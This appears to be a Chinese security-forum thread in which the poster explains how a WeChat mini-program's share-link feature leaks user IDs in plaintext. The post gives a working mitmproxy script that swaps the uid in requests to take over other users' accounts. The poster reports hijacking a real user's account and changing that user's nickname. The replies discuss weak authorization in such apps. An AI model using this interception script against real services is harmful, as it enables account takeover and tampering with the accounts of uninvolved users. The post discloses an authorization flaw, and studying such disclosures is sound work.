某小程序通过助力链接盗号

418 · 发表于 2024-11-4 14:04

本帖最后由 418 于 2024-11-4 19:43 编辑

又是上一个小程序，开发出来挨打（不是）

是盗小程序的账号，不是微信号~

助力玩法如下

[url=]image-20241104134623869.png[/url]

转发到群里，别人点进去就算助力成功

[url=]image-20241104134709385.png[/url]

浅浅抓个包，发现助力的jid(用户凭证)明文传输
[url=]image-20241104123656763.png[/url]

于是用mitmproxy写了个脚本

from mitmproxy import http
from multy_account.account import uid_list

def request(flow: http.HTTPFlow) -> None:
    # pretty_host takes the "Host" header of the request into account,
    # which is useful in transparent mode where we usually only have the IP
    # otherwise.
    if flow.request.pretty_host == "xxx.xxxxxx.com":
        print(flow.request.url)
        # print(flow.request.urlencoded_form['uid'])
        if flow.request.urlencoded_form['uid']:
            flow.request.urlencoded_form['uid'] = uid_list[2]

再次刷新小程序，成功获取到别人的账号

随机修改一位幸运观众的昵称 :D
javascript:;

慕浟佳〃井少年 · 发表于 2024-11-4 14:36

外包开发的吧或者是不注重安全的小公司

qqpoly · 发表于 2024-11-5 08:06

很多小程序都在这个水准上，问题是有时候，逼迫你必须处理，比如娃娃上学有关的，你工作相关的

sharees · 发表于 2024-11-6 17:12

看不懂就问，这是干什么用的

snowcatflyer · 发表于 2024-11-7 08:52

qqpoly 发表于 2024-11-5 08:06
很多小程序都在这个水准上，问题是有时候，逼迫你必须处理，比如娃娃上学有关的，你工作相关的

环境换经济基本进入尾声，yinsi换经济正当时，大环境如此，非常难规范

AGLJX0651 · 发表于 2024-11-4 14:12

看不懂就问，这是干什么用的

YSYM1003 · 发表于 2024-11-4 14:23

看不懂就问，这是干什么用的

Ly1988 · 发表于 2024-11-4 14:33

看不懂就问，这是干什么用的

soyadokio · 发表于 2024-11-4 14:39

这世界本就是个草台班子

wd12826 · 发表于 2024-11-4 14:44

看不懂就问，这是干什么用的

ok748521 · 发表于 2024-11-4 14:48

坑人的东西太多太多太多了

gggod · 发表于 2024-11-4 14:49

这属于越权吧，没有鉴权呀直接uid登陆了吗

lauded · 发表于 2024-11-4 14:51

感谢楼主分享

帐号		自动登录	找回密码
密码			注册[Register]

[Android 原创] 某小程序通过助力链接盗号

免费评分